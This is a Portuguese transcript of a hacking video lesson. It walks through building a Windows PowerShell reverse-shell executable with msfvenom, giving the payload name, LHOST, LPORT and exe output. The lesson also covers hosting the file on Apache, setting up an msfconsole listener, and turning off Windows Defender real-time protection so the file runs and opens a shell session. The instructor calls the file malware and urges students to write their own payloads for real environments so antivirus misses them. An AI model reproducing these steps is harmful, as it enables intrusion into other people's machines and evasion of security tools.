Bom, nessa aula aqui a gente vai aprender a fazer um payload utilizando o Metasploit, né? O que é um payload? A gente vai simplesmente utilizar o Metasploit para criar um arquivo executável, né? Um malwarezinho, para a gente conseguir uma shell reversa aqui no Windows. Na aula passada a gente aprendeu a instalar o Metasploit. O Metasploit é uma ferramenta bem complexa e bem grande. Essa daqui é a versão free do Metasploit, certo? Ele tem uma versão paga. Com ele a gente consegue, com a versão free, na verdade, a gente já consegue ter acesso a vários exploits, a vários módulos auxiliares, a vários payloads, que vai ser o que a gente vai estar utilizando. O Metasploit ele é uma ferramenta para pentest e exploração de ambientes bem completa, certo? E a versão paga a versão paga oferece para a gente outros exploits, né? Vários, um banco de dados maior ali de exploit. E se você for um profissional da área, tiver interesse, você pode estar olhando isso com a equipe oficial, com os desenvolvedores oficial, que é o pessoal do Rapid7. Acho que é isso mesmo, se não me engano. Mas aqui a gente vai aprender a utilizar os payloads, né, do Metasploit. Então eu vou sair aqui do painel Zoom, voltar aqui para o meu terminal. Vamos aprender como que é bem simples a gente criar um payload aqui com o Metasploit. Então eu vou usar o utilitário MSF Venom. E só passando ele aqui, a gente já tem uma listagem, um help dele, né, bem simples, como que ele funciona. E a gente vai utilizar aqui o parâmetro list para a gente listar o que ele tem. Aqui a gente consegue listar os payloaders, os encoders, os módulos. Então eu vou fechar aqui, deixa eu... Então, MSF Venom, -L, e aqui eu posso listar os payloads. Aqui ele vai me listar todos os payloads. Então, rodar simplesmente dessa forma aqui pode ser um pouco até difícil, né, da gente ver todos os payloads. Eu vou esperar ele carregar aqui e já volto. Beleza, aqui ele me listou os payloads. Então aqui a gente já consegue ver, por exemplo, alguns payloads para Windows, né? VNC Inject. Se a gente subir, a gente vê mais payloads para Linux, dessa vez Shell, Pingback. Se a gente subir, a gente vai ver todos os payloads. Aqui, por último, ele está listando os payloads de Windows, mas não são só esses, né? Deixa eu subir um pouquinho para ver se eu consigo ver mais alguns aqui. São muitos payloads. OS X, na verdade, macOS, né? Linux, Java, ele tem vários payloads. Então a gente pode dar uma filtrada nisso, utilizando o grep. Então eu poderia filtrar, por exemplo, MSF Venom grep Android, por exemplo. Vamos ver o que ele vai me listar. E aqui, por exemplo, ele me lista os payloads que tem para Android, né, que é para a gente gerar, por exemplo, um APK malicioso. A gente poderia filtrar também para o Windows, para a gente ver somente aqueles que têm o Windows no nome. E aqui, por exemplo, ele já consegue listar para mim os payloads de Windows. Então eu vou subir um pouquinho e vou caçar algum payload aqui, o Windows Shell Bind. Aqui, ó, Windows 64 PowerShell Reverse TCP. Então esse daqui, por exemplo, seria para a gente conseguir um acesso a um PowerShell, né? E nos Windows mais modernos, o PowerShell ele é um bash, digamos assim, muito mais poderoso do que o CMD, né? Então é mais interessante a gente conseguir um PowerShell. Então eu vou copiar todo esse caminho aqui, ó, todo esse nome aqui, ó, Windows /64, que é para 64 bits, PowerShell Reverse TCP. De qualquer forma, eu vou escolher esse daqui, mas você pode brincar, escolher qualquer um desses aqui, até para você ver como que funciona. Você pode escolher alguns que é para Android, caso você tenha um Android aí e queira testar, Linux, você pode pegar aí para você ver como que funciona e brincando com eles. Então, agora que eu já copiei o nome, vamos montar o nosso payload. Então, MSF Venom, eu escrevi errado, Venom, traço P para especificar o payload, e eu passo o meu payload. Agora eu vou especificar o IP e a porta que o meu vírus ele vai se comunicar. Então ele vai se comunicar em um ambiente local, certo? Porque eu estou na mesma máquina, eu estou na mesma rede que o meu ambiente aqui que eu vou testar.
Então, se eu quiser setar a porta com qual o vírus vai se conectar, eu vou passar o LPort, que é o local port. E o meu, quer dizer, local port, né, e a porta 8443, e o lhost, que é para especificar o IP 10.0.0101, que é o meu IP local. Se você tiver em um ambiente externo, você pode usar o rhost e o rport, né, para remote host e remote port. Espera aí, lport, lhost. A gente passa o F para especificar o tipo do arquivo, né? Então eu vou querer um arquivo .exe, deixa eu diminuir um pouquinho aqui. E aqui, só com isso daqui, ele já vai gerar o meu exe. Só que eu preciso salvar isso em algum lugar, né? Então, todo o executável, ele vai me jogar aqui como saída. Então, eu simplesmente redireciono a saída para o nome do meu arquivo. Então, sinal de maior, eu vou chamar aqui de arquivo.exe. E aqui é só deixar rodar, que ele vai já gerar o meu arquivo.exe. Gerou, não demorou muito. Se eu rodar um ls arquivo.exe, tá aqui o meu arquivo. E agora eu preciso jogar isso aqui para lá dentro do Windows, né? Aí você dá os seus pulos para jogar isso lá dentro. Eu vou usar o servidor web que eu já ensinei a gente instalar aqui, o Apache, porque simplesmente eu consigo acessar aqui pela web e baixar ele. Então, eu vou jogar ele dentro do meu var. Eu posso ver se o meu Apache está rodando. Service Apache 2 status. O meu Apache está rodando. Então, eu posso jogar o meu arquivo lá para dentro. Arquivo /var www. Joguei. Agora, eu vou acessar o meu Metasploit. Eu só vou garantir que eu tenho copiado o payload que eu utilizei, porque eu só tenho que garantir isso. E agora eu vou rodar o MSF console. Abri aqui o MSF console e agora eu preciso usar o meu payload. Então eu posso apenas rodar use, passar o payload que eu quero utilizar. Opa, eu passei um caractere a mais. Use o meu payload. Agora eu posso ver as opções. Show options. E aqui ele tem as opções, ó, o lhost e lport. Isso aqui é a porta e IP onde ele vai escutar. Então eu posso setar aqui, por exemplo, lhost, eu posso setar como 0.0.0.0. Ou eu posso setar o meu IP local. Mas eu vou setar aqui 0.0 porque aí eu recebo de qualquer um. Na verdade, set lhost, né? Se a gente, como eu quero modificar aqui o lhost, set lhost. Posso passar em maiúsculo também, igual tá aqui, ó. Não vai mudar muita coisa. E agora o lport, set lport. E eu tenho que setar o mesmo que eu setei aqui na hora de gerar, né? Qual que eu pus? 8443. Pronto, gerei. Agora tudo que eu tenho que fazer é executar ele. Então eu posso rodar um exploit. Ele iniciou, agora ele está aguardando conexões. Enquanto isso, eu vou aqui no meu Windows, vou abrir o meu browser e vou baixar o arquivo. 10.0.0.101 barra arquivo.exe. Deixa eu ver se é isso mesmo, porque eu posso ter me confundido ali na hora de gerar ele. Arquivo.exe. Service Apache status. Deixa eu ver se eu joguei ele lá pra dentro. var www. Tá certo. Por que eu não estou conseguindo baixá-lo? Deixa eu ver se ele tá aqui mesmo. Eu vou fechar aqui só para ver se o meu vírus ele tá ali certinho, porque eu posso ter cometido um erro. Vou apertar aqui só o exit para sair. Eu vou lá no meu var www.html arquivo.exe vírus.exe. Não está conseguindo acessar. Por quê? Ah, sim. É porque é dentro do HTML. Move arquivo para dentro do HTML. Agora sim. Aqui está o meu servidor web. Então agora, se eu baixar ele aqui, ó, eu vou conseguir.
baixei. Só que repara que o meu próprio browser já bloqueou aqui como sendo perigoso. Eu acho que eu consigo forçar ele a baixar ele mesmo assim. Mostrar todos os downloads. Não sei se eu vou conseguir manter ele aqui pelo Chrome. Eu vou tentar baixar ele pelo Firefox. A gente realmente vai ter esses problemas com o Metasploit, né? Porque como é uma ferramenta já pronta, com vários vírus prontos e tal, os antivírus todos vão barrar ele. Então, por exemplo, agora se eu voltar aqui localhost não, 10.0.0.101, arquivo.exe, que agora eu consegui baixar. Então eu vou voltar lá no meu Metasploit, msf console. Vou dar o meu use aqui no meu... Opa! Deixa eu pegar aqui qual que é esse. Use set rhost lhost 0.0.0.0 set lport 8443 exploit. Rodei o exploit de novo. Agora se eu tentar rodar o meu vírus, acho que ele não vai rodar. Olha lá, o Windows já detectou um problema. Eu vou aqui em mais opções, vou executar mesmo assim. Ó, ele não detectou. Por quê? Porque o meu antivírus não vai deixar eu executar ele assim simplesmente. Então se eu quiser usar o Metasploit para gerar um payload, eu vou ter que desabilitar aqui o meu antivírus, né? Então eu vou ter que vir aqui, Windows Defender. Posso vir aqui a segurança do Windows. Proteção contra vírus e ameaças. Gerenciar configurações aqui em proteção contra vírus e ameaças. E vou desabilitar a proteção em tempo real. Agora que eu tenho desabilitado a proteção em tempo real, deixa eu ver se meu arquivo ainda está aqui. Não, ele apagou, eu posso baixar ele de novo. Vou rodar. E vai aparecer essa telinha, vou executar mesmo assim. Ele abriu um PowerShell, fechou. O antivírus detectando aqui, mas aqui no PowerShell, no PowerShell não, no Metasploit, eu recebi uma sessão. Então eu vou apertar Enter aqui só para eu poder executar comandos e vou utilizar o comando sessions-L para eu ver as sessões que eu tenho aberta. E aqui ele já fala, ó, eu tenho já uma sessão aberta. Se eu quiser me juntar a essa sessão, eu posso usar o sessions-I e o número da minha sessão. Qual que é o ID dela? É o 1. Então, 1. Sessions. Agora sim. E aqui eu me junto e eu tenho já um acesso ao PowerShell. Né? Exatamente como a gente tinha feito com o nosso payload. Né? A diferença é que o antivírus padrão aqui não pegou. Mas então, você pode ir brincando aí com o PowerShell, aprendendo... Com PowerShell não, com o MSF Venom, testando outros payloads. Em ambiente real eu não recomendo vocês usarem os payloads do Metasploit, eu recomendo sempre vocês estarem desenvolvendo o seu próprio, justamente por causa disso, né? Por ser um código pronto aqui assim, você vai ter muitos problemas que talvez sejam muito mais fáceis de ser resolvidos quando você faz o seu próprio código. Mas vocês podem ir brincando nele, com ele aqui, até mesmo para vocês tirarem as próprias ideias, né? Ver como que ele funciona, às vezes implementar uma funcionalidade que já tem aqui no seu próprio vírusinho. Utilizar sempre o seu, porque aí você não vai ter problemas com antivírus e esse tipo de coisa. Mas é assim que a gente utiliza o Metasploit para conseguir uma shell. E ele também funciona para Android, como eu mostrei, então fique à vontade para ficar brincando aí e explorar ele o máximo possível.